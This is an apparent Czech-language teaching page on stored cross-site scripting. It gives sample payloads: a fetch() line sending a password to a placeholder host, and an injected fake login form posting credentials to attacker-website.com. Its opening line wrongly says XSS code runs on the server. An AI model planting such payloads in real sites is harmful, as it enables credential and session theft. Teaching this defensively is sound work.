<div class="level-theory">
	Cross-Site Scripting (XSS) útoky spočívají ve spouštění škodlivého JavaScript kódu na serveru.<br>
	Stored XSS útoky využívají toho, že servery tento JavaScript kód ukládají v databázi.<br>
	<br>
	Představme si zranitelné dotazní fórum, kde útočník vytvoří takovýto příspěvěk:
	<span class="code multi-line-code nosplit">
		Mám otázku.
		&lt;script&gt;alert("Hello, World!");&lt;/script&gt;
	</span><br>
	Tento příspěvěk zveřejní a po načtení stránky se jeho příspěvek na stránce objeví.<br>
	<br>
	Uživatelé ale na stránce uvidí pouze text "Mám otázku." a JavaScript kód už ne.<br>
	Bude vidět, když si zobrazíte zdrojový kód stránky, což běžný uživatel nedělá.<br>
	<br>
	<span class="red bold font-size-bigger">Teď nastává problém!</span><br>
	Kdykoliv někdo stránku navštíví, tak se tento komentář načte, a s ním i tento skript, který se okamžitě i spustí.<br>
	V tomto případě by se pouze zobrazilo okno s nápisem "Hello, World!", ale skutečný útočník by mohl například posílat data z vaší relace na svoji vzálenou adresu.<br>
	<br>
	Tento problém spočívá v tom, že aplikace ukládá komentář v prostém textu a ten potom vkládá do HTML dokumentu.<br>
	To ovšem znamená, že jakýkoliv HTML kód bude prohlížečem považován za legitimní a bude tak taky zobrazen.<br>
	Toto v případě vstupu od uživatele nechceme.<br>
	<br>
	Pomocí JavaScriptu lze například odesílat data na jiné adresy pomocí funkcí <a href="https://javascript.info/xmlhttprequest">XMLHttpRequest</a> nebo <a href="https://javascript.info/fetch">fetch</a><br>
	<pre class="code multi-line-code nosplit">
&lt;script&gt;
    fetch("http://send/secrets/here?password=ABCabc123");
&lt;/script&gt;
</pre>
	<br>
	Krom toho se dá také modifikovat samotné HTML:<br>
	<pre class="code multi-line-code nosplit">
&lt;script&gt;document.body.innerHTML='&lt;html kod&gt;'&lt;/script&gt;
</pre><br>
	Modifikovat by se dal například takto:<br>
	<pre class="code multi-line-code nosplit">
&lt;form action="https://attacker-website.com" method="POST"&gt;
    Username:
    &lt;input type="text" name="username"&gt;
    Password:
    &lt;input type="password" name="passwd"&gt;
    &lt;input type="submit" value="Submit"&gt;
&lt;/form&gt;
</pre><br>
	Tímto by se tělo stránky (&lt;body&gt;) přepsalo na nově zadaný HTML kód.<br>
	<br>
	Příklad napsán výš je například formulář, který se ptá uživatele na uživatelské jméno a heslo, a výsledky potom odesílá na útočníkovu URL adresu.<br>
</div>
